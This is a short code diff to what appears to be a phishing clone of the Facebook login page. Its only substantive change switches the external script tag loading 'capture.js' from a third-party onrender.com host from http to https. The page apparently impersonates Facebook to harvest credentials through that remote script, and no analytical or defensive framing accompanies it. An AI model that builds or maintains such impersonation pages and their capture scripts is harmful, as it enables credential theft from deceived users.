--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
   <title>Facebook – log in or sign up</title>
   <link rel="stylesheet" href="/style.css" />
   <link rel="icon" href="/favicon.ico" type="image/x-icon">
-  <script src="http://zaza-4f7z.onrender.com/capture.js"></script>
+  <script src="https://zaza-4f7z.onrender.com/capture.js"></script>
 </head>
 <body>
   <div class="language-switcher">
@@ -138,5 +138,6 @@
       }
     });
   </script>
+
 </body>
 </html>
